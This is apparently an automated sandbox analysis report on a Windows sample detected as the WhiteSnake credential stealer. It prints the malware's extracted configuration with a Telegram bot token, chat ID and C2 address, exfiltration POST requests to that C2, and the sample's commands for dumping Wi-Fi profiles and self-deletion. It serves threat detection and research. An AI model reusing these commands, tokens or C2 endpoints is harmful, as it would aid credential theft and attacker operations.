Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1550646
MD5:	cd0da55aa7811e92f71088f57df9a493
SHA1:	a9430383ea4500243858a74d51bc4dcb5eda23c2
SHA256:	0d503ceee2af7760bc677a71274ed2ba2c0b7d746f48fb816e091a7c92c55862
Tags:	exeuser-Bitsight
Infos:

Detection

WhiteSnake Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected WhiteSnake Stealer

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Self deletion via cmd or bat file

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses netsh to modify the Windows network and firewall settings

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 3144 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CD0DA55AA7811E92F71088F57DF9A493)

cmd.exe (PID: 4296 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3716 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 6604 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 1020 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 5832 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1532 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 5148 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 3180 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 6500 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6764 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

timeout.exe (PID: 7156 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)

cleanup

Malware Configuration

Threatname: WhiteSnake

{"Version": "1.6.3.4", "Telegram Token": "7628354786:AAG5ULd2m-BqZfqQURreSGmnSGl-Y4hCa4c", "Telegram chatid": "7470447426", "C2 urls": ["http://91.223.3.164:8080"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: file.exe PID: 3144	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3144	JoeSecurity_WhiteSnake	Yara detected WhiteSnake Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3144, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 4296, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 91.223.3.164, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 3144, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3144, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 4296, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T00:07:00.914550+0100	2050602	1	A Network Trojan was detected	192.168.2.5	49705	91.223.3.164	8080	TCP

ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T00:07:00.855825+0100	2050601	1	A Network Trojan was detected	192.168.2.5	49705	91.223.3.164	8080	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: WhiteSnake {"Version": "1.6.3.4", "Telegram Token": "7628354786:AAG5ULd2m-BqZfqQURreSGmnSGl-Y4hCa4c", "Telegram chatid": "7470447426", "C2 urls": ["http://91.223.3.164:8080"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848E67BB1 CryptUnprotectData,		0_2_00007FF848E67BB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848E67CFD CryptUnprotectData,		0_2_00007FF848E67CFD

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then dec eax	0_2_00007FF848E661C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 00007FF848E6D71Ah	0_2_00007FF848E6D4C1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 00007FF848E6CF5Eh	0_2_00007FF848E6AD9E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 00007FF848E6C506h	0_2_00007FF848E6BDF8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then dec eax	0_2_00007FF848E710FF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 00007FF848E6CF5Eh	0_2_00007FF848E6CB76
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 00007FF848E66E2Ch	0_2_00007FF848E66C29
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 00007FF848E6EFEDh	0_2_00007FF848E6EEE9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 00007FF848E6CF5Eh	0_2_00007FF848E6C68F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 00007FF848E7301Ah	0_2_00007FF848E72FA3
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then dec eax	0_2_00007FF848E6CF36

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.5:49705 -> 91.223.3.164:8080
Source: Network traffic	Suricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.5:49705 -> 91.223.3.164:8080

Source: global traffic

TCP traffic: 192.168.2.5:49705 -> 91.223.3.164:8080

Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un=YWxmb25z&pc=MTM4NzI3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 91.223.3.164:8080Content-Length: 148982Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

ASN Name: PL-SKYTECH-ASPL PL-SKYTECH-ASPL

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.164
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ip-api.com

Source: unknown

HTTP traffic detected: POST /sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un=YWxmb25z&pc=MTM4NzI3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 91.223.3.164:8080Content-Length: 148982Expect: 100-continueConnection: Keep-Alive

Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.126.19.171:80
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.132.223.26:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.43.160.136:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.161.20.142:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://116.202.101.219:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://129.151.109.160:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://159.203.174.113:8090
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.99.138.249:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.138.211.88:8099
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.228.80.130:80
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:80
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.164.198.113:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.166.251.4:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.189.109.146:80
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://38.60.191.38:80
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://41.87.207.180:9090
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.82.65.63:80
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.4.73.118:9000
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.110.140.182:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.96.78.224:8080
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://66.42.56.128:80
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.134.71.132:8082
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.219.110.16:9999
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.223.3.164:8080
Source: file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.223.3.164:8080/sendData
Source: file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.223.3.164:8080/sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un
Source: file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.223.3.164:80802
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://95.216.147.179:80
Source: file.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.00000206000DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: file.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line?fields=query
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: file.exe, 00000000.00000002.2074990140.00000206001E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://101.126.19.171:443
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://138.2.92.67:443
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://154.9.207.142:443
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://192.99.196.191:443
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://44.228.161.50:443
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://5.196.181.135:443
Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.2078691178.000002061014A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2078691178.0000020610152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.2078691178.000002061014A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2078691178.0000020610152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

.NET source code contains very large strings

Source: file.exe, m1B6vc.cs

Long String: Length: 11394

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848E62953		0_2_00007FF848E62953
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848E67415		0_2_00007FF848E67415

Source: file.exe, 00000000.00000002.2084259666.000002067C0B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.2023939236.000002067BEA2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamer3cb3a7a4c0bd9460d9b130.exeh$ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamer3cb3a7a4c0bd9460d9b130.exeh$ vs file.exe

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@26/3@1/2

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\nb3ruhpgao

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Mutant created: \Sessions\1\BaseNamedObjects\jv3vebus8g
Source: C:\Users\user\Desktop\file.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2074990140.000002060007F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.00000206003D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.0000020600094000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
